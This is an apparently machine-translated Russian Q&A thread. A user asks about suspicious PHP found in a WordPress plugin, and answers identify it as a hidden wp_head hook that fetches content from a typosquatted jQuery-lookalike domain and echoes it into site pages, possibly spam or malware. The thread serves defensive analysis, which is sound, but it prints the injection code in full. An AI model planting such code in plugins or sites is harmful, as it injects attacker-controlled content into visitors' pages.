Я нашел это в плагине. Что оно делает? Это опасно?

Я нашел это в плагине. Что оно делает? Это опасно?

add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); } 

Solutions Collecting From Web of "Я нашел это в плагине. Что оно делает? Это опасно?"

Он загружает блок разметки, содержащий спам (я думал о публикации немного источника, но я не хочу рекламировать контент каким-либо образом) из домена, который является близким неправильным написанием домена – http://jquery.com/ – используется jQuery, авторитетной и популярной библиотекой Javascript и той, которую WordPress включает в Core. Я думаю, что идея состоит в том, чтобы загрузить эту библиотеку, когда на самом деле загружается что-то совсем другое.

И другими способами пытается загрузиться jQuery. Обратите внимание на имя переменной $jquery .

Он также может попытаться загрузить вредоносные скрипты. Я не проверял. Я определенно назвал бы это опасным, особенно потому, что контент на этой странице может измениться в любое время, когда контроллеры домена почувствуют это.

В лучшем случае он повредит ваш сайт, так как поисковые системы смотрят вниз на сайты, на которых распространяется спам.

Не используйте его. Это ничего не выгодно для вас или для кого-либо еще в Интернете, кроме людей, которые запустили сайт. Если вы нашли это на авторитетном сайте, сообщите об этом им.

Да, это опасный код, загружающий контент со спам-сайта.

Вы не указали плагин, но если вы нашли этот код после его установки на своем веб-сайте, возможно, что код плагина не появился от такого разработчика, а был взломан после его установки. Если это так, вы можете найти вредоносный код на своем веб-сайте, а не только этот плагин.

Проверьте загруженный код плагина из того места, где вы получили плагин, и посмотрите, был ли этот вредоносный код изначально. Если нет, то ваш сайт был взломан. Если вы решите, что это так, прочитайте эту статью из Кодекса .